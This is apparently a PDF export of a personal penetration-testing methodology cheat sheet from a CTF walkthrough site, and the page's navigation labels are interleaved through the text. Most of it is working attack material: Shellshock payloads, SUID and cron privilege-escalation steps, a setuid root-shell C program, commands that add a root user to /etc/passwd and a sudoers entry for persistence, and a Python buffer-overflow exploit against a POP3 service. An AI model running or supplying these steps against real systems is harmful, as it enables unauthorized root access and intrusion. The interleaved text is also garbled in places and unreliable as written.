1> xp_cmdshell 'type "C:\Documents and Settings\Administrator\Desktop\proof.txt"'
2> go

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
output: contents of proof.txt
output: NULL
(return status = 0)
Methodology
H p site
Enum PE
Misc
SQLMAP Sequence:
Linux
Easy fail - /etc/passwd (and shadow) permision, SAM file in Repairs, check how patched the system is to get an idea of next steps
Python
Kernel Exploit
PHP
Info disclosure in compromised service/user - also check logs and home folders
WordPress
files/folders/service (permission) misconfigura on
Samaba Share
Run LPC/WPC
Bruteforce
Follow PE guide
Password Cracking
Encoding Once in, look for clues in current dir and user home dir
Rev Shell
PHP web shell If you find both passwd and shadow you can use unshadow to combine them and then run john: Unshadow passwd shadow>combined
Metasploit
msfconsole Always run ps aux: ps -f ax for parent id ps afx for graphical parent id
Meterperter
Shell shock
POST
Msfvenom
env x='() { :;}; echo vulnerable' bash -c "ps aux"
Persistence
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
Windows
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"
SMB
MsSQL
check sudo -l for a list of commands that the current user can run as other users without entering any password.
PE
BO if python is found find / -name "python*" 2>/dev/null it can be used to get TTY with: python -c 'import pty; pty.spawn("/bin/bash")'
Python script
Docker Find writable files for user: find / -writable -type f 2>/dev/null | grep -v ^/proc

Any suspected file run periodically (via crontab) which can be edited might allow to PE.

look through logs to find interes ng processes/configura ons

Find files which have s ckey bit on /bin/find / -perm -4001 -type f 2>/dev/null

uid and gid with root find / -perm +2000 -user root -type f 2>/dev/null find / -perm +4000 -user root -type f 2>/dev/null

Run command using s ckybit in executable to get shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
write c executable that sets setuid(0) setgid(0) then system(/bin/bash).
As root, change owner to root:root and permission to 4755.
Run it as your user and you have root shell check for files which s ckey bits
Methodology
H p site /etc/passwd is writable:
Enum
Misc echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
SQLMAP su - dummy
Linux
Python add user in both passwd and shadow toor:toor:
PHP
WordPress echo 'toor:x:0:0:root:/root:/bin/bash' >>/etc/passwd
Samaba Share echo 'toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:
Bruteforce
Password Cracking
Encoding msf exploit(handler) > run post/multi/recon/local_exploit_suggester
Rev Shell
if we have euid set to 1001 python -c 'import os,pty; os.setresuid(1001,1001,1001); pty.spawn("/bin/bash")'
PHP web shell
Metasploit
#include <stdio.h>
msfconsole
#include <sys/types.h>
Meterperter
#include <unistd.h>
POST
int main(void)
Msfvenom
{
Persistence
setuid(0); setgid(0); system("/bin/bash"); //setregit(0,0); setegit(0); in case we have only euid set to 0. To check r
Windows
}
SMB
MsSQL
PE Maintaing PE echo "userName ALL=(ALL:ALL) ALL">>/etc/sudoers then use sudo su from user userName
BO
Python script
Docker
BO
Windows:

Immnunity debugger

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

root@kali:~/labs/614# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
00000000 FFE4 jmp esp
nasm > add eax,12
00000000 83C00C add eax,byte +0xc
Methodology
H p site !mona modules
Enum !mona find -s "\xff\xe4" -m SLMFC.DLL
Misc
SQLMAP write return address in the script return for x86 (LE)
Linux
Python Python script
PHP
WordPress
#!/usr/bin/python
Samaba Share
import socket
Bruteforce #string = "A"*2700
Password Cracking string = "A"*2606
Encoding string += "\xE3\x41\x4B\x5F"
Rev Shell buf = "\x90"*20 # NOPs to allow decoding
PHP web shell string += buf
Metasploit try:
msfconsole s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Meterperter connect=s.connect(('10.11.17.98',110))
POST s.recv(1024)
Msfvenom s.send('USER test\r\n')
Persistence s.recv(1024)
Windows s.send('PASS ' + string + '\r\n')
SMB s.send('QUIT\r\n')

MsSQL s.close()
except:
PE
print('Unable to connect')
BO
exit(0)
Python script
Docker
Linux:

edb --run /usr/games/crossfire/bin/crossfire

Strings <filename>
Ollydbg for windows
F2 - place breakpoint
F7 - jump into
F8 - allow completion

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
objdump -d file will dump assembly

Methodology Docker
H p site
Enum Get path of container in host file structure:
Misc
docker_path=/proc/$(docker inspect --format <ContainerID>)/root
SQLMAP
Linux transfer docker image to host by using root@kali:~/# docker save uzyexe/nmap -o nmap.tar and a er copying on target:
Python
PHP docker load -input nmap.tar
WordPress docker run --network=br0 -it --rm uzyexe/nmap -sn -T4 -v 10.10.10.0/24 >scan.out &
Samaba Share
Bruteforce Iden fy if you are inside a container - cat /proc/self/cgroup | grep docker
Password Cracking
Encoding
Rev Shell
Walkthrough
PHP web shell
Metasploit Walkthrough malikashish8
msfconsole
malikashish8
Meterperter
POST
Msfvenom This a GitHub Pages project which holds Walkhtoughs/Write-up's of CTF, Vulnerable Machines and exploits that I come across.
Persistence
Windows
SMB
MsSQL
PE
BO
Python script
Docker

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like